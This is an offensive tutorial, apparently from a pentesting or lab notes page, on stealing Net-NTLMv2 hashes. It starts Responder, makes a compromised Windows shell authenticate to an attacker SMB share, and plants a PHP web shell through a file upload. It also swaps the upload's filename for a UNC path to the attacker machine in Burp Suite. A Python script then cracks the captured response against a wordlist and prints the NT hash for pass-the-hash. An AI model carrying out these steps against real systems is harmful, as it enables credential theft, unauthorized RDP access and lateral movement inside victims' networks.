Capturing and cracking NTLMv2 hashes
Purpose
Suppose you have a shell as the user bittu, and bittu is a member of the Remote Desktop Users group. With bittu's credentials you could therefore log in over RDP. To obtain them, we make the compromised host authenticate to our machine over SMB, capture the resulting NTLMv2 challenge-response (Net-NTLMv2) and crack it offline. Note that a captured Net-NTLMv2 response is not the NT hash: it cannot be used for pass-the-hash. It can only be cracked, or relayed live (for example with Impacket's ntlmrelayx) to a host that does not require SMB signing.
This is also useful when we do not have the rights to run mimikatz on the machine.
[SMB share] Steps for capturing and cracking an NTLMv2 hash (SMB)
Step 1: Start Responder on Kali
To capture the SMB authentication, Responder must be listening on the Kali interface the target can reach (in most labs this is the VPN tunnel interface).
# Start responder
sudo responder -I <YourVPNTunnelInterface>
# Example:
# sudo responder -I tun0
Step 2: Make a fake request for a share
From the shell on the target, request a share on the Kali IP. The share does not need to exist: the host tries to authenticate to Responder's SMB server and the NTLMv2 response is captured. The target must be able to reach Kali on TCP port 445 for this to work.
# Run the command below in the shell on the target.
dir \\IP_KALI\FakeShare
Step 3: Store the hash and crack it
Responder prints the captured hash in the USER::DOMAIN:challenge:NTProofStr:blob format that hashcat and john accept directly. Store it in a file and crack it with hashcat in NetNTLMv2 mode (hash mode 5600) or with john, using a wordlist such as rockyou.
Once cracked, you have bittu's plaintext password and can log in over RDP with it.
Note: if the target runs a web application that accepts file uploads, the same hash can be captured through the upload, either by uploading a file that lets you run commands and issuing the SMB request from it, or by making the web server itself connect to your machine (next section).
[Website-Upload] Steps and example of exploiting a web upload for the hash
Step 1: Find a directory or page from which you can upload a file.
You can use gobuster to enumerate directories and then check the ones it finds for an upload form.
Step 2: Upload the file
Suppose you find that PHP is supported; upload a PHP file from which you can run commands via a URL parameter (a web shell). From it you can issue the same dir \\IP_KALI\FakeShare request as in the SMB section.
Step 3: Start Responder on Kali
To capture the request, Responder must be listening on the Kali interface the target can reach (sudo responder -I tun0, as above).
Step 4: Capture the upload request in Burp Suite and change its file name
Intercept the multipart upload request and replace the filename field with a UNC path pointing at your Kali box, for example \\IP_KALI\FakeShare\shell.php. When the web server's process tries to store or stat the file under that path, it authenticates to Responder over SMB, so the hash you capture belongs to the account the web application runs as (which may or may not be bittu).
Original file:
(screenshot: the upload request with its original filename)
Modify the name like this...
(screenshot: the upload request with the filename replaced by the UNC path)
You will see the NTLMv2 hash in Responder.
(screenshot: Responder output with the captured hash)
Store the hash in a file named user.hash.
Step 5: Cracking the hash
Crack user.hash the same way as the SMB capture: hashcat in NetNTLMv2 mode (hash mode 5600) or john with a wordlist. When a candidate matches, hashcat's --show option prints the hash together with the recovered password.
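The following is an added example and not code from the original page or from Responder, hashcat or john: a Python re-implementation of what hashcat mode 5600 computes when it cracks a Net-NTLMv2 line, so it applies equally to the hash captured through the SMB share and to the one captured through the web upload. It builds a capture for the user bittu from a constructed server challenge and client blob, parses it back in the USER::DOMAIN:challenge:NTProofStr:blob format, and recovers the password from a small wordlist by recomputing NTProofStr for every candidate. The domain EXAMPLE, the password, the challenge bytes, the blob bytes and the wordlist are all constructed for the demo. MD4 is implemented inline because OpenSSL 3 builds of Python frequently lack hashlib's md4. It also makes the point from the Purpose section concrete: the captured value is an HMAC over the server's challenge, so it cannot be replayed against a fresh challenge; the NT hash that pass-the-hash needs only becomes available once the password is cracked.

```python
import hmac
import hashlib
import struct
from typing import Iterable, Optional

# --- MD4 (RFC 1320), inline because hashlib.new("md4") is often unavailable on OpenSSL 3 ---
_MD4_ROUNDS = (
    # (boolean function, order of message words X[k], shift schedule, additive constant)
    (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0x00000000),
    (lambda x, y, z: (x & y) | (x & z) | (y & z),
     [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
    (lambda x, y, z: x ^ y ^ z,
     [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
)

def _rotl(x: int, s: int) -> int:
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)     # pad to 56 mod 64 ...
    msg += struct.pack("<Q", bit_len)                  # ... then the 64-bit LE bit length
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in _MD4_ROUNDS:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c                # rotate registers for the next step
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

# --- NTLMv2 pieces (MS-NLMP section 3.3.2) ---
def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; this is what pass-the-hash would need."""
    return md4(password.encode("utf-16-le"))

def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """HMAC_MD5(NT hash, UNICODE(UPPERCASE(user) + domain)); the domain keeps its case."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()

def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || client blob): bound to this challenge."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()

def capture_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Format the response the way Responder prints it and hashcat -m 5600 reads it."""
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"

def parse_capture(line: str) -> dict:
    """Split a Responder line and sanity-check the field sizes before wasting GPU time on it."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    # 8-byte server challenge, 16-byte HMAC-MD5, blob starting with RespType/HiRespType 0x01 0x01
    if len(chal) != 16 or len(proof) != 32 or not blob.lower().startswith("0101"):
        raise ValueError("not a NetNTLMv2 (hashcat 5600) line")
    return {"user": user, "domain": domain, "server_challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}

def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """What hashcat -m 5600 does: recompute NTProofStr per candidate and compare."""
    cap = parse_capture(line)
    for candidate in wordlist:
        guess = nt_proof_str(candidate, cap["user"], cap["domain"], cap["server_challenge"], cap["blob"])
        if hmac.compare_digest(guess, cap["proof"]):
            return candidate
    return None

# --- Constructed demo data (not a real capture) ---
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
# NTLMv2_CLIENT_CHALLENGE (MS-NLMP 2.2.2.7): RespType 1, HiRespType 1, 6 reserved bytes,
# FILETIME timestamp, 8-byte client nonce, 4 reserved, empty AV_PAIR list (MsvAvEOL), 4 reserved.
BLOB = bytes.fromhex("0101000000000000" "00d0a7b4c2f0d901" "a1b2c3d4e5f60718"
                     "00000000" "00000000" "00000000")
DEMO_USER, DEMO_DOMAIN, DEMO_PASSWORD = "bittu", "EXAMPLE", "Summer2023!"   # all assumed
DEMO_LINE = capture_line(DEMO_USER, DEMO_DOMAIN, DEMO_PASSWORD, SERVER_CHALLENGE, BLOB)
DEMO_WORDLIST = ["password", "Welcome1", "Summer2023!", "letmein"]

if __name__ == "__main__":
    print("captured:", DEMO_LINE)
    pw = crack(DEMO_LINE, DEMO_WORDLIST)
    print("cracked password:", pw)
    if pw:
        print("NT hash usable for pass-the-hash:", nt_hash(pw).hex())
```

With a real capture the equivalent is hashcat -m 5600 user.hash <wordlist> (hashcat -m 5600 user.hash --show afterwards to print the result); the script only makes visible what that mode recomputes for every candidate. Because NTProofStr is keyed over the server's own challenge, a captured line is useless against a new NTLM negotiation, which is why the page's "pass it" only works after cracking (pass the NT hash) or as a live relay.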